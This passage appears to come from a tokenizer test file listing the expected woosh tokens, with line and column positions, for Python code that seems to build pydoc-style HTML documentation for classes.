woosh.Token(woosh.INDENT, ' ', 947, 0, 947, 16),
woosh.Token(woosh.NAME, 'mdict', 947, 16, 947, 21),
woosh.Token(woosh.OP, '[', 947, 21, 947, 22),
woosh.Token(woosh.NAME, 'value', 947, 22, 947, 27),
woosh.Token(woosh.OP, ']', 947, 27, 947, 28),
woosh.Token(woosh.OP, '=', 947, 29, 947, 30),
woosh.Token(woosh.NAME, 'anchor', 947, 31, 947, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 947, 37, 948, 0),
woosh.Token(woosh.DEDENT, ' ', 948, 0, 948, 12),
woosh.Token(woosh.NAME, 'except', 948, 12, 948, 18),
woosh.Token(woosh.NAME, 'TypeError', 948, 19, 948, 28),
woosh.Token(woosh.OP, ':', 948, 28, 948, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 948, 29, 949, 0),
woosh.Token(woosh.INDENT, ' ', 949, 0, 949, 16),
woosh.Token(woosh.NAME, 'pass', 949, 16, 949, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 949, 20, 950, 0),
woosh.Token(woosh.DEDENT, ' ', 951, 0, 951, 8),
woosh.Token(woosh.DEDENT, '', 951, 8, 951, 8),
woosh.Token(woosh.NAME, 'while', 951, 8, 951, 13),
woosh.Token(woosh.NAME, 'attrs', 951, 14, 951, 19),
woosh.Token(woosh.OP, ':', 951, 19, 951, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 951, 20, 952, 0),
woosh.Token(woosh.INDENT, ' ', 952, 0, 952, 12),
woosh.Token(woosh.NAME, 'if', 952, 12, 952, 14),
woosh.Token(woosh.NAME, 'mro', 952, 15, 952, 18),
woosh.Token(woosh.OP, ':', 952, 18, 952, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 952, 19, 953, 0),
woosh.Token(woosh.INDENT, ' ', 953, 0, 953, 16),
woosh.Token(woosh.NAME, 'thisclass', 953, 16, 953, 25),
woosh.Token(woosh.OP, '=', 953, 26, 953, 27),
woosh.Token(woosh.NAME, 'mro', 953, 28, 953, 31),
woosh.Token(woosh.OP, '.', 953, 31, 953, 32),
woosh.Token(woosh.NAME, 'popleft', 953, 32, 953, 39),
woosh.Token(woosh.OP, '(', 953, 39, 953, 40),
woosh.Token(woosh.OP, ')', 953, 40, 953, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 953, 41, 954, 0),
woosh.Token(woosh.DEDENT, ' ', 954, 0, 954, 12),
woosh.Token(woosh.NAME, 'else', 954, 12, 954, 16),
woosh.Token(woosh.OP, ':', 954, 16, 954, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 954, 17, 955, 0),
woosh.Token(woosh.INDENT, ' ', 955, 0, 955, 16),
woosh.Token(woosh.NAME, 'thisclass', 955, 16, 955, 25),
woosh.Token(woosh.OP, '=', 955, 26, 955, 27),
woosh.Token(woosh.NAME, 'attrs', 955, 28, 955, 33),
woosh.Token(woosh.OP, '[', 955, 33, 955, 34),
woosh.Token(woosh.NUMBER, '0', 955, 34, 955, 35),
woosh.Token(woosh.OP, ']', 955, 35, 955, 36),
woosh.Token(woosh.OP, '[', 955, 36, 955, 37),
woosh.Token(woosh.NUMBER, '2', 955, 37, 955, 38),
woosh.Token(woosh.OP, ']', 955, 38, 955, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 955, 39, 956, 0),
woosh.Token(woosh.DEDENT, ' ', 956, 0, 956, 12),
woosh.Token(woosh.NAME, 'attrs', 956, 12, 956, 17),
woosh.Token(woosh.OP, ',', 956, 17, 956, 18),
woosh.Token(woosh.NAME, 'inherited', 956, 19, 956, 28),
woosh.Token(woosh.OP, '=', 956, 29, 956, 30),
woosh.Token(woosh.NAME, '_split_list', 956, 31, 956, 42),
woosh.Token(woosh.OP, '(', 956, 42, 956, 43),
woosh.Token(woosh.NAME, 'attrs', 956, 43, 956, 48),
woosh.Token(woosh.OP, ',', 956, 48, 956, 49),
woosh.Token(woosh.NAME, 'lambda', 956, 50, 956, 56),
woosh.Token(woosh.NAME, 't', 956, 57, 956, 58),
woosh.Token(woosh.OP, ':', 956, 58, 956, 59),
woosh.Token(woosh.NAME, 't', 956, 60, 956, 61),
woosh.Token(woosh.OP, '[', 956, 61, 956, 62),
woosh.Token(woosh.NUMBER, '2', 956, 62, 956, 63),
woosh.Token(woosh.OP, ']', 956, 63, 956, 64),
woosh.Token(woosh.NAME, 'is', 956, 65, 956, 67),
woosh.Token(woosh.NAME, 'thisclass', 956, 68, 956, 77),
woosh.Token(woosh.OP, ')', 956, 77, 956, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 956, 78, 957, 0),
woosh.Token(woosh.NAME, 'if', 958, 12, 958, 14),
woosh.Token(woosh.NAME, 'object', 958, 15, 958, 21),
woosh.Token(woosh.NAME, 'is', 958, 22, 958, 24),
woosh.Token(woosh.NAME, 'not', 958, 25, 958, 28),
woosh.Token(woosh.NAME, 'builtins', 958, 29, 958, 37),
woosh.Token(woosh.OP, '.', 958, 37, 958, 38),
woosh.Token(woosh.NAME, 'object', 958, 38, 958, 44),
woosh.Token(woosh.NAME, 'and', 958, 45, 958, 48),
woosh.Token(woosh.NAME, 'thisclass', 958, 49, 958, 58),
woosh.Token(woosh.NAME, 'is', 958, 59, 958, 61),
woosh.Token(woosh.NAME, 'builtins', 958, 62, 958, 70),
woosh.Token(woosh.OP, '.', 958, 70, 958, 71),
woosh.Token(woosh.NAME, 'object', 958, 71, 958, 77),
woosh.Token(woosh.OP, ':', 958, 77, 958, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 958, 78, 959, 0),
woosh.Token(woosh.INDENT, ' ', 959, 0, 959, 16),
woosh.Token(woosh.NAME, 'attrs', 959, 16, 959, 21),
woosh.Token(woosh.OP, '=', 959, 22, 959, 23),
woosh.Token(woosh.NAME, 'inherited', 959, 24, 959, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 959, 33, 960, 0),
woosh.Token(woosh.NAME, 'continue', 960, 16, 960, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 960, 24, 961, 0),
woosh.Token(woosh.DEDENT, ' ', 961, 0, 961, 12),
woosh.Token(woosh.NAME, 'elif', 961, 12, 961, 16),
woosh.Token(woosh.NAME, 'thisclass', 961, 17, 961, 26),
woosh.Token(woosh.NAME, 'is', 961, 27, 961, 29),
woosh.Token(woosh.NAME, 'object', 961, 30, 961, 36),
woosh.Token(woosh.OP, ':', 961, 36, 961, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 961, 37, 962, 0),
woosh.Token(woosh.INDENT, ' ', 962, 0, 962, 16),
woosh.Token(woosh.NAME, 'tag', 962, 16, 962, 19),
woosh.Token(woosh.OP, '=', 962, 20, 962, 21),
woosh.Token(woosh.STRING, "'defined here'", 962, 22, 962, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 962, 36, 963, 0),
woosh.Token(woosh.DEDENT, ' ', 963, 0, 963, 12),
woosh.Token(woosh.NAME, 'else', 963, 12, 963, 16),
woosh.Token(woosh.OP, ':', 963, 16, 963, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 963, 17, 964, 0),
woosh.Token(woosh.INDENT, ' ', 964, 0, 964, 16),
woosh.Token(woosh.NAME, 'tag', 964, 16, 964, 19),
woosh.Token(woosh.OP, '=', 964, 20, 964, 21),
woosh.Token(woosh.STRING, "'inherited from %s'", 964, 22, 964, 41),
woosh.Token(woosh.OP, '%', 964, 42, 964, 43),
woosh.Token(woosh.NAME, 'self', 964, 44, 964, 48),
woosh.Token(woosh.OP, '.', 964, 48, 964, 49),
woosh.Token(woosh.NAME, 'classlink', 964, 49, 964, 58),
woosh.Token(woosh.OP, '(', 964, 58, 964, 59),
woosh.Token(woosh.NAME, 'thisclass', 964, 59, 964, 68),
woosh.Token(woosh.OP, ',', 964, 68, 964, 69),
woosh.Token(woosh.NAME, 'object', 965, 59, 965, 65),
woosh.Token(woosh.OP, '.', 965, 65, 965, 66),
woosh.Token(woosh.NAME, '__module__', 965, 66, 965, 76),
woosh.Token(woosh.OP, ')', 965, 76, 965, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 965, 77, 966, 0),
woosh.Token(woosh.DEDENT, ' ', 966, 0, 966, 12),
woosh.Token(woosh.NAME, 'tag', 966, 12, 966, 15),
woosh.Token(woosh.OP, '+=', 966, 16, 966, 18),
woosh.Token(woosh.STRING, "':<br>\\n'", 966, 19, 966, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 966, 28, 967, 0),
woosh.Token(woosh.NAME, 'sort_attributes', 968, 12, 968, 27),
woosh.Token(woosh.OP, '(', 968, 27, 968, 28),
woosh.Token(woosh.NAME, 'attrs', 968, 28, 968, 33),
woosh.Token(woosh.OP, ',', 968, 33, 968, 34),
woosh.Token(woosh.NAME, 'object', 968, 35, 968, 41),
woosh.Token(woosh.OP, ')', 968, 41, 968, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 968, 42, 969, 0),
woosh.Token(woosh.COMMENT, '# Pump out the attrs, segregated by kind.', 970, 12, 970, 53),
woosh.Token(woosh.NAME, 'attrs', 971, 12, 971, 17),
woosh.Token(woosh.OP, '=', 971, 18, 971, 19),
woosh.Token(woosh.NAME, 'spill', 971, 20, 971, 25),
woosh.Token(woosh.OP, '(', 971, 25, 971, 26),
woosh.Token(woosh.STRING, "'Methods %s'", 971, 26, 971, 38),
woosh.Token(woosh.OP, '%', 971, 39, 971, 40),
woosh.Token(woosh.NAME, 'tag', 971, 41, 971, 44),
woosh.Token(woosh.OP, ',', 971, 44, 971, 45),
woosh.Token(woosh.NAME, 'attrs', 971, 46, 971, 51),
woosh.Token(woosh.OP, ',', 971, 51, 971, 52),
woosh.Token(woosh.NAME, 'lambda', 972, 26, 972, 32),
woosh.Token(woosh.NAME, 't', 972, 33, 972, 34),
woosh.Token(woosh.OP, ':', 972, 34, 972, 35),
woosh.Token(woosh.NAME, 't', 972, 36, 972, 37),
woosh.Token(woosh.OP, '[', 972, 37, 972, 38),
woosh.Token(woosh.NUMBER, '1', 972, 38, 972, 39),
woosh.Token(woosh.OP, ']', 972, 39, 972, 40),
woosh.Token(woosh.OP, '==', 972, 41, 972, 43),
woosh.Token(woosh.STRING, "'method'", 972, 44, 972, 52),
woosh.Token(woosh.OP, ')', 972, 52, 972, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 972, 53, 973, 0),
woosh.Token(woosh.NAME, 'attrs', 973, 12, 973, 17),
woosh.Token(woosh.OP, '=', 973, 18, 973, 19),
woosh.Token(woosh.NAME, 'spill', 973, 20, 973, 25),
woosh.Token(woosh.OP, '(', 973, 25, 973, 26),
woosh.Token(woosh.STRING, "'Class methods %s'", 973, 26, 973, 44),
woosh.Token(woosh.OP, '%', 973, 45, 973, 46),
woosh.Token(woosh.NAME, 'tag', 973, 47, 973, 50),
woosh.Token(woosh.OP, ',', 973, 50, 973, 51),
woosh.Token(woosh.NAME, 'attrs', 973, 52, 973, 57),
woosh.Token(woosh.OP, ',', 973, 57, 973, 58),
woosh.Token(woosh.NAME, 'lambda', 974, 26, 974, 32),
woosh.Token(woosh.NAME, 't', 974, 33, 974, 34),
woosh.Token(woosh.OP, ':', 974, 34, 974, 35),
woosh.Token(woosh.NAME, 't', 974, 36, 974, 37),
woosh.Token(woosh.OP, '[', 974, 37, 974, 38),
woosh.Token(woosh.NUMBER, '1', 974, 38, 974, 39),
woosh.Token(woosh.OP, ']', 974, 39, 974, 40),
woosh.Token(woosh.OP, '==', 974, 41, 974, 43),
woosh.Token(woosh.STRING, "'class method'", 974, 44, 974, 58),
woosh.Token(woosh.OP, ')', 974, 58, 974, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 974, 59, 975, 0),
woosh.Token(woosh.NAME, 'attrs', 975, 12, 975, 17),
woosh.Token(woosh.OP, '=', 975, 18, 975, 19),
woosh.Token(woosh.NAME, 'spill', 975, 20, 975, 25),
woosh.Token(woosh.OP, '(', 975, 25, 975, 26),
woosh.Token(woosh.STRING, "'Static methods %s'", 975, 26, 975, 45),
woosh.Token(woosh.OP, '%', 975, 46, 975, 47),
woosh.Token(woosh.NAME, 'tag', 975, 48, 975, 51),
woosh.Token(woosh.OP, ',', 975, 51, 975, 52),
woosh.Token(woosh.NAME, 'attrs', 975, 53, 975, 58),
woosh.Token(woosh.OP, ',', 975, 58, 975, 59),
woosh.Token(woosh.NAME, 'lambda', 976, 26, 976, 32),
woosh.Token(woosh.NAME, 't', 976, 33, 976, 34),
woosh.Token(woosh.OP, ':', 976, 34, 976, 35),
woosh.Token(woosh.NAME, 't', 976, 36, 976, 37),
woosh.Token(woosh.OP, '[', 976, 37, 976, 38),
woosh.Token(woosh.NUMBER, '1', 976, 38, 976, 39),
woosh.Token(woosh.OP, ']', 976, 39, 976, 40),
woosh.Token(woosh.OP, '==', 976, 41, 976, 43),
woosh.Token(woosh.STRING, "'static method'", 976, 44, 976, 59),
woosh.Token(woosh.OP, ')', 976, 59, 976, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 976, 60, 977, 0),
woosh.Token(woosh.NAME, 'attrs', 977, 12, 977, 17),
woosh.Token(woosh.OP, '=', 977, 18, 977, 19),
woosh.Token(woosh.NAME, 'spilldescriptors', 977, 20, 977, 36),
woosh.Token(woosh.OP, '(', 977, 36, 977, 37),
woosh.Token(woosh.STRING, '"Readonly properties %s"', 977, 37, 977, 61),
woosh.Token(woosh.OP, '%', 977, 62, 977, 63),
woosh.Token(woosh.NAME, 'tag', 977, 64, 977, 67),
woosh.Token(woosh.OP, ',', 977, 67, 977, 68),
woosh.Token(woosh.NAME, 'attrs', 977, 69, 977, 74),
woosh.Token(woosh.OP, ',', 977, 74, 977, 75),
woosh.Token(woosh.NAME, 'lambda', 978, 37, 978, 43),
woosh.Token(woosh.NAME, 't', 978, 44, 978, 45),
woosh.Token(woosh.OP, ':', 978, 45, 978, 46),
woosh.Token(woosh.NAME, 't', 978, 47, 978, 48),
woosh.Token(woosh.OP, '[', 978, 48, 978, 49),
woosh.Token(woosh.NUMBER, '1', 978, 49, 978, 50),
woosh.Token(woosh.OP, ']', 978, 50, 978, 51),
woosh.Token(woosh.OP, '==', 978, 52, 978, 54),
woosh.Token(woosh.STRING, "'readonly property'", 978, 55, 978, 74),
woosh.Token(woosh.OP, ')', 978, 74, 978, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 978, 75, 979, 0),
woosh.Token(woosh.NAME, 'attrs', 979, 12, 979, 17),
woosh.Token(woosh.OP, '=', 979, 18, 979, 19),
woosh.Token(woosh.NAME, 'spilldescriptors', 979, 20, 979, 36),
woosh.Token(woosh.OP, '(', 979, 36, 979, 37),
woosh.Token(woosh.STRING, "'Data descriptors %s'", 979, 37, 979, 58),
woosh.Token(woosh.OP, '%', 979, 59, 979, 60),
woosh.Token(woosh.NAME, 'tag', 979, 61, 979, 64),
woosh.Token(woosh.OP, ',', 979, 64, 979, 65),
woosh.Token(woosh.NAME, 'attrs', 979, 66, 979, 71),
woosh.Token(woosh.OP, ',', 979, 71, 979, 72),
woosh.Token(woosh.NAME, 'lambda', 980, 37, 980, 43),
woosh.Token(woosh.NAME, 't', 980, 44, 980, 45),
woosh.Token(woosh.OP, ':', 980, 45, 980, 46),
woosh.Token(woosh.NAME, 't', 980, 47, 980, 48),
woosh.Token(woosh.OP, '[', 980, 48, 980, 49),
woosh.Token(woosh.NUMBER, '1', 980, 49, 980, 50),
woosh.Token(woosh.OP, ']', 980, 50, 980, 51),
woosh.Token(woosh.OP, '==', 980, 52, 980, 54),
woosh.Token(woosh.STRING, "'data descriptor'", 980, 55, 980, 72),
woosh.Token(woosh.OP, ')', 980, 72, 980, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 980, 73, 981, 0),
woosh.Token(woosh.NAME, 'attrs', 981, 12, 981, 17),
woosh.Token(woosh.OP, '=', 981, 18, 981, 19),
woosh.Token(woosh.NAME, 'spilldata', 981, 20, 981, 29),
woosh.Token(woosh.OP, '(', 981, 29, 981, 30),
woosh.Token(woosh.STRING, "'Data and other attributes %s'", 981, 30, 981, 60),
woosh.Token(woosh.OP, '%', 981, 61, 981, 62),
woosh.Token(woosh.NAME, 'tag', 981, 63, 981, 66),
woosh.Token(woosh.OP, ',', 981, 66, 981, 67),
woosh.Token(woosh.NAME, 'attrs', 981, 68, 981, 73),
woosh.Token(woosh.OP, ',', 981, 73, 981, 74),
woosh.Token(woosh.NAME, 'lambda', 982, 30, 982, 36),
woosh.Token(woosh.NAME, 't', 982, 37, 982, 38),
woosh.Token(woosh.OP, ':', 982, 38, 982, 39),
woosh.Token(woosh.NAME, 't', 982, 40, 982, 41),
woosh.Token(woosh.OP, '[', 982, 41, 982, 42),
woosh.Token(woosh.NUMBER, '1', 982, 42, 982, 43),
woosh.Token(woosh.OP, ']', 982, 43, 982, 44),
woosh.Token(woosh.OP, '==', 982, 45, 982, 47),
woosh.Token(woosh.STRING, "'data'", 982, 48, 982, 54),
woosh.Token(woosh.OP, ')', 982, 54, 982, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 982, 55, 983, 0),
woosh.Token(woosh.NAME, 'assert', 983, 12, 983, 18),
woosh.Token(woosh.NAME, 'attrs', 983, 19, 983, 24),
woosh.Token(woosh.OP, '==', 983, 25, 983, 27),
woosh.Token(woosh.OP, '[', 983, 28, 983, 29),
woosh.Token(woosh.OP, ']', 983, 29, 983, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 983, 30, 984, 0),
woosh.Token(woosh.NAME, 'attrs', 984, 12, 984, 17),
woosh.Token(woosh.OP, '=', 984, 18, 984, 19),
woosh.Token(woosh.NAME, 'inherited', 984, 20, 984, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 984, 29, 985, 0),
woosh.Token(woosh.DEDENT, ' ', 986, 0, 986, 8),
woosh.Token(woosh.NAME, 'contents', 986, 8, 986, 16),
woosh.Token(woosh.OP, '=', 986, 17, 986, 18),
woosh.Token(woosh.STRING, "''", 986, 19, 986, 21),
woosh.Token(woosh.OP, '.', 986, 21, 986, 22),
woosh.Token(woosh.NAME, 'join', 986, 22, 986, 26),
woosh.Token(woosh.OP, '(', 986, 26, 986, 27),
woosh.Token(woosh.NAME, 'contents', 986, 27, 986, 35),
woosh.Token(woosh.OP, ')', 986, 35, 986, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 986, 36, 987, 0),
woosh.Token(woosh.NAME, 'if', 988, 8, 988, 10),
woosh.Token(woosh.NAME, 'name', 988, 11, 988, 15),
woosh.Token(woosh.OP, '==', 988, 16, 988, 18),
woosh.Token(woosh.NAME, 'realname', 988, 19, 988, 27),
woosh.Token(woosh.OP, ':', 988, 27, 988, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 988, 28, 989, 0),
woosh.Token(woosh.INDENT, ' ', 989, 0, 989, 12),
woosh.Token(woosh.NAME, 'title', 989, 12, 989, 17),
woosh.Token(woosh.OP, '=', 989, 18, 989, 19),
woosh.Token(woosh.STRING, '\'<a name="%s">class <strong>%s</strong></a>\'', 989, 20, 989, 64),
woosh.Token(woosh.OP, '%', 989, 65, 989, 66),
woosh.Token(woosh.OP, '(', 989, 67, 989, 68),
woosh.Token(woosh.NAME, 'name', 990, 16, 990, 20),
woosh.Token(woosh.OP, ',', 990, 20, 990, 21),
woosh.Token(woosh.NAME, 'realname', 990, 22, 990, 30),
woosh.Token(woosh.OP, ')', 990, 30, 990, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 990, 31, 991, 0),
woosh.Token(woosh.DEDENT, ' ', 991, 0, 991, 8),
woosh.Token(woosh.NAME, 'else', 991, 8, 991, 12),
woosh.Token(woosh.OP, ':', 991, 12, 991, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 991, 13, 992, 0),
woosh.Token(woosh.INDENT, ' ', 992, 0, 992, 12),
woosh.Token(woosh.NAME, 'title', 992, 12, 992, 17),
woosh.Token(woosh.OP, '=', 992, 18, 992, 19),
woosh.Token(woosh.STRING, '\'<strong>%s</strong> = <a name="%s">class %s</a>\'', 992, 20, 992, 69),
woosh.Token(woosh.OP, '%', 992, 70, 992, 71),
woosh.Token(woosh.OP, '(', 992, 72, 992, 73),
woosh.Token(woosh.NAME, 'name', 993, 16, 993, 20),
woosh.Token(woosh.OP, ',', 993, 20, 993, 21),
woosh.Token(woosh.NAME, 'name', 993, 22, 993, 26),
woosh.Token(woosh.OP, ',', 993, 26, 993, 27),
woosh.Token(woosh.NAME, 'realname', 993, 28, 993, 36),
woosh.Token(woosh.OP, ')', 993, 36, 993, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 993, 37, 994, 0),
woosh.Token(woosh.DEDENT, ' ', 994, 0, 994, 8),
woosh.Token(woosh.NAME, 'if', 994, 8, 994, 10),
woosh.Token(woosh.NAME, 'bases', 994, 11, 994, 16),
woosh.Token(woosh.OP, ':', 994, 16, 994, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 994, 17, 995, 0),
woosh.Token(woosh.INDENT, ' ', 995, 0, 995, 12),
woosh.Token(woosh.NAME, 'parents', 995, 12, 995, 19),
woosh.Token(woosh.OP, '=', 995, 20, 995, 21),
woosh.Token(woosh.OP, '[', 995, 22, 995, 23),
woosh.Token(woosh.OP, ']', 995, 23, 995, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 995, 24, 996, 0),
woosh.Token(woosh.NAME, 'for', 996, 12, 996, 15),
woosh.Token(woosh.NAME, 'base', 996, 16, 996, 20),
woosh.Token(woosh.NAME, 'in', 996, 21, 996, 23),
woosh.Token(woosh.NAME, 'bases', 996, 24, 996, 29),
woosh.Token(woosh.OP, ':', 996, 29, 996, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 996, 30, 997, 0),
woosh.Token(woosh.INDENT, ' ', 997, 0, 997, 16),
woosh.Token(woosh.NAME, 'parents', 997, 16, 997, 23),
woosh.Token(woosh.OP, '.', 997, 23, 997, 24),
woosh.Token(woosh.NAME, 'append', 997, 24, 997, 30),
woosh.Token(woosh.OP, '(', 997, 30, 997, 31),
woosh.Token(woosh.NAME, 'self', 997, 31, 997, 35),
woosh.Token(woosh.OP, '.', 997, 35, 997, 36),
woosh.Token(woosh.NAME, 'classlink', 997, 36, 997, 45),
woosh.Token(woosh.OP, '(', 997, 45, 997, 46),
woosh.Token(woosh.NAME, 'base', 997, 46, 997, 50),
woosh.Token(woosh.OP, ',', 997, 50, 997, 51),
woosh.Token(woosh.NAME, 'object', 997, 52, 997, 58),
woosh.Token(woosh.OP, '.', 997, 58, 997, 59),
woosh.Token(woosh.NAME, '__module__', 997, 59, 997, 69),
woosh.Token(woosh.OP, ')', 997, 69, 997, 70),
woosh.Token(woosh.OP, ')', 997, 70, 997, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 997, 71, 998, 0),
woosh.Token(woosh.DEDENT, ' ', 998, 0, 998, 12),
woosh.Token(woosh.NAME, 'title', 998, 12, 998, 17),
woosh.Token(woosh.OP, '=', 998, 18, 998, 19),
woosh.Token(woosh.NAME, 'title', 998, 20, 998, 25),
woosh.Token(woosh.OP, '+', 998, 26, 998, 27),
woosh.Token(woosh.STRING, "'(%s)'", 998, 28, 998, 34),
woosh.Token(woosh.OP, '%', 998, 35, 998, 36),
woosh.Token(woosh.STRING, "', '", 998, 37, 998, 41),
woosh.Token(woosh.OP, '.', 998, 41, 998, 42),
woosh.Token(woosh.NAME, 'join', 998, 42, 998, 46),
woosh.Token(woosh.OP, '(', 998, 46, 998, 47),
woosh.Token(woosh.NAME, 'parents', 998, 47, 998, 54),
woosh.Token(woosh.OP, ')', 998, 54, 998, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 998, 55, 999, 0),
woosh.Token(woosh.DEDENT, ' ', 1000, 0, 1000, 8),
woosh.Token(woosh.NAME, 'decl', 1000, 8, 1000, 12),
woosh.Token(woosh.OP, '=', 1000, 13, 1000, 14),
woosh.Token(woosh.STRING, "''", 1000, 15, 1000, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1000, 17, 1001, 0),
woosh.Token(woosh.NAME, 'try', 1001, 8, 1001, 11),
woosh.Token(woosh.OP, ':', 1001, 11, 1001, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1001, 12, 1002, 0),
woosh.Token(woosh.INDENT, ' ', 1002, 0, 1002, 12),
woosh.Token(woosh.NAME, 'signature', 1002, 12, 1002, 21),
woosh.Token(woosh.OP, '=', 1002, 22, 1002, 23),
woosh.Token(woosh.NAME, 'inspect', 1002, 24, 1002, 31),
woosh.Token(woosh.OP, '.', 1002, 31, 1002, 32),
woosh.Token(woosh.NAME, 'signature', 1002, 32, 1002, 41),
woosh.Token(woosh.OP, '(', 1002, 41, 1002, 42),
woosh.Token(woosh.NAME, 'object', 1002, 42, 1002, 48),
woosh.Token(woosh.OP, ')', 1002, 48, 1002, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1002, 49, 1003, 0),
woosh.Token(woosh.DEDENT, ' ', 1003, 0, 1003, 8),
woosh.Token(woosh.NAME, 'except', 1003, 8, 1003, 14),
woosh.Token(woosh.OP, '(', 1003, 15, 1003, 16),
woosh.Token(woosh.NAME, 'ValueError', 1003, 16, 1003, 26),
woosh.Token(woosh.OP, ',', 1003, 26, 1003, 27),
woosh.Token(woosh.NAME, 'TypeError', 1003, 28, 1003, 37),
woosh.Token(woosh.OP, ')', 1003, 37, 1003, 38),
woosh.Token(woosh.OP, ':', 1003, 38, 1003, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1003, 39, 1004, 0),
woosh.Token(woosh.INDENT, ' ', 1004, 0, 1004, 12),
woosh.Token(woosh.NAME, 'signature', 1004, 12, 1004, 21),
woosh.Token(woosh.OP, '=', 1004, 22, 1004, 23),
woosh.Token(woosh.NAME, 'None', 1004, 24, 1004, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1004, 28, 1005, 0),
woosh.Token(woosh.DEDENT, ' ', 1005, 0, 1005, 8),
woosh.Token(woosh.NAME, 'if', 1005, 8, 1005, 10),
woosh.Token(woosh.NAME, 'signature', 1005, 11, 1005, 20),
woosh.Token(woosh.OP, ':', 1005, 20, 1005, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1005, 21, 1006, 0),
woosh.Token(woosh.INDENT, ' ', 1006, 0, 1006, 12),
woosh.Token(woosh.NAME, 'argspec', 1006, 12, 1006, 19),
woosh.Token(woosh.OP, '=', 1006, 20, 1006, 21),
woosh.Token(woosh.NAME, 'str', 1006, 22, 1006, 25),
woosh.Token(woosh.OP, '(', 1006, 25, 1006, 26),
woosh.Token(woosh.NAME, 'signature', 1006, 26, 1006, 35),
woosh.Token(woosh.OP, ')', 1006, 35, 1006, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1006, 36, 1007, 0),
woosh.Token(woosh.NAME, 'if', 1007, 12, 1007, 14),
woosh.Token(woosh.NAME, 'argspec', 1007, 15, 1007, 22),
woosh.Token(woosh.NAME, 'and', 1007, 23, 1007, 26),
woosh.Token(woosh.NAME, 'argspec', 1007, 27, 1007, 34),
woosh.Token(woosh.OP, '!=', 1007, 35, 1007, 37),
woosh.Token(woosh.STRING, "'()'", 1007, 38, 1007, 42),
woosh.Token(woosh.OP, ':', 1007, 42, 1007, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1007, 43, 1008, 0),
woosh.Token(woosh.INDENT, ' ', 1008, 0, 1008, 16),
woosh.Token(woosh.NAME, 'decl', 1008, 16, 1008, 20),
woosh.Token(woosh.OP, '=', 1008, 21, 1008, 22),
woosh.Token(woosh.NAME, 'name', 1008, 23, 1008, 27),
woosh.Token(woosh.OP, '+', 1008, 28, 1008, 29),
woosh.Token(woosh.NAME, 'self', 1008, 30, 1008, 34),
woosh.Token(woosh.OP, '.', 1008, 34, 1008, 35),
woosh.Token(woosh.NAME, 'escape', 1008, 35, 1008, 41),
woosh.Token(woosh.OP, '(', 1008, 41, 1008, 42),
woosh.Token(woosh.NAME, 'argspec', 1008, 42, 1008, 49),
woosh.Token(woosh.OP, ')', 1008, 49, 1008, 50),
woosh.Token(woosh.OP, '+', 1008, 51, 1008, 52),
woosh.Token(woosh.STRING, "'\\n\\n'", 1008, 53, 1008, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1008, 59, 1009, 0),
woosh.Token(woosh.DEDENT, ' ', 1010, 0, 1010, 8),
woosh.Token(woosh.DEDENT, '', 1010, 8, 1010, 8),
woosh.Token(woosh.NAME, 'doc', 1010, 8, 1010, 11),
woosh.Token(woosh.OP, '=', 1010, 12, 1010, 13),
woosh.Token(woosh.NAME, 'getdoc', 1010, 14, 1010, 20),
woosh.Token(woosh.OP, '(', 1010, 20, 1010, 21),
woosh.Token(woosh.NAME, 'object', 1010, 21, 1010, 27),
woosh.Token(woosh.OP, ')', 1010, 27, 1010, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1010, 28, 1011, 0),
woosh.Token(woosh.NAME, 'if', 1011, 8, 1011, 10),
woosh.Token(woosh.NAME, 'decl', 1011, 11, 1011, 15),
woosh.Token(woosh.OP, ':', 1011, 15, 1011, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1011, 16, 1012, 0),
woosh.Token(woosh.INDENT, ' ', 1012, 0, 1012, 12),
woosh.Token(woosh.NAME, 'doc', 1012, 12, 1012, 15),
woosh.Token(woosh.OP, '=', 1012, 16, 1012, 17),
woosh.Token(woosh.NAME, 'decl', 1012, 18, 1012, 22),
woosh.Token(woosh.OP, '+', 1012, 23, 1012, 24),
woosh.Token(woosh.OP, '(', 1012, 25, 1012, 26),
woosh.Token(woosh.NAME, 'doc', 1012, 26, 1012, 29),
woosh.Token(woosh.NAME, 'or', 1012, 30, 1012, 32),
woosh.Token(woosh.STRING, "''", 1012, 33, 1012, 35),
